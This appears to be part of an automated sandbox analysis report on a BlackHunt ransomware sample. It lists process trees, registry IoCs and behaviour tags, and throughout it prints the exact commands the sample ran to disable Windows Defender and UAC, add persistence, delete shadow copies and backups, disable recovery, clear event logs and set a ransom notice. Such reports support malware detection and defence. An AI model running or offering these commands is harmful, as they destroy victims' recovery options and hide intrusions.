6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 179 PID 2856 wrote to memory of 2184 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 109 PID 2856 wrote to memory of 2184 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 109 PID 2856 wrote to memory of 1680 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 111 PID 2856 wrote to memory of 1680 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 111 PID 2856 wrote to memory of 1732 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 120 PID 2856 wrote to memory of 1732 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 120 PID 456 wrote to memory of 1836 456 cmd.exe 119 PID 456 wrote to memory of 1836 456 cmd.exe 119 PID 2968 wrote to memory of 1940 2968 cmd.exe 150 PID 2968 wrote to memory of 1940 2968 cmd.exe 150 PID 1192 wrote to memory of 2116 1192 cmd.exe 117 PID 1192 wrote to memory of 2116 1192 cmd.exe 117 PID 2080 wrote to memory of 1856 2080 cmd.exe 116 PID 2080 wrote to memory of 1856 2080 cmd.exe 116 PID 2260 wrote to memory of 464 2260 cmd.exe 152 PID 2260 wrote to memory of 464 2260 cmd.exe 152 PID 2856 wrote to memory of 3376 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 118 PID 2856 wrote to memory of 3376 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 118 PID 2856 wrote to memory of 4444 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 215 PID 2856 wrote to memory of 4444 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 215 PID 2856 wrote to memory of 3604 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 139 PID 2856 wrote to memory of 3604 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 139 PID 2856 wrote to memory of 1076 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 122 PID 2856 wrote to memory of 1076 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 122 PID 2856 wrote to memory of 4576 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 126 PID 2856 wrote to memory of 4576 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 126 PID 2856 wrote to memory of 3880 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 128 PID 2856 wrote to memory of 3880 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 128 PID 2136 wrote to memory of 4512 2136 Conhost.exe 129 PID 2136 wrote to memory of 4512 2136 Conhost.exe 129 PID 2856 wrote to memory of 2404 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 136 PID 2856 wrote to memory of 2404 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 136 PID 2856 wrote to memory of 1188 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 217 PID 2856 wrote to memory of 1188 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 217 PID 2856 wrote to memory of 4156 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 133 PID 2856 wrote to memory of 4156 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 133 PID 2856 wrote to memory of 2656 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 137 PID 2856 wrote to memory of 2656 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 137 PID 2856 wrote to memory of 4536 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 141 PID 2856 wrote to memory of 4536 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 141 PID 2856 wrote to memory of 5000 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 213 PID 2856 wrote to memory of 5000 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 213 PID 2856 wrote to memory of 5052 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 212 PID 2856 wrote to memory of 5052 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 212 PID 4300 wrote to memory of 1264 4300 cmd.exe 162 PID 4300 wrote to memory of 1264 4300 cmd.exe 162 PID 1680 wrote to memory of 4232 1680 cmd.exe 210 PID 1680 wrote to memory of 4232 1680 cmd.exe 210 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe"C:\Users\Admin\AppData\Local\Temp\6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2856 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2136
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:1264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2184
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1076
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3880
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:7804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1188
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:5180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4156
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2404
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:6648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:9552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:9816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1280
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:1940
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:9932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe" /F2⤵PID:4164
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:464
-
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe" /F3⤵
- Creates scheduled task(s)
PID:10156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1284
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1544
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:9980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3404
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies Windows Defender Real-time Protection settings
PID:1264
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2708
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3040
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2200
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5340
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5376
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5292
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5172
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:5052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:5000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5240
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:9044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11392
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:11384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:12848
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:14316
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1456
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:6564
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:11368
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11488
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:11928
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:6548
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:7156
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:12448
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:14168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:7012
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:12244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:11288
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:12320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:11568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:12208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:11292
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:12172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:14156
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:12216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:5564
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:11652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe"2⤵PID:11780
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:12468
-
-
-
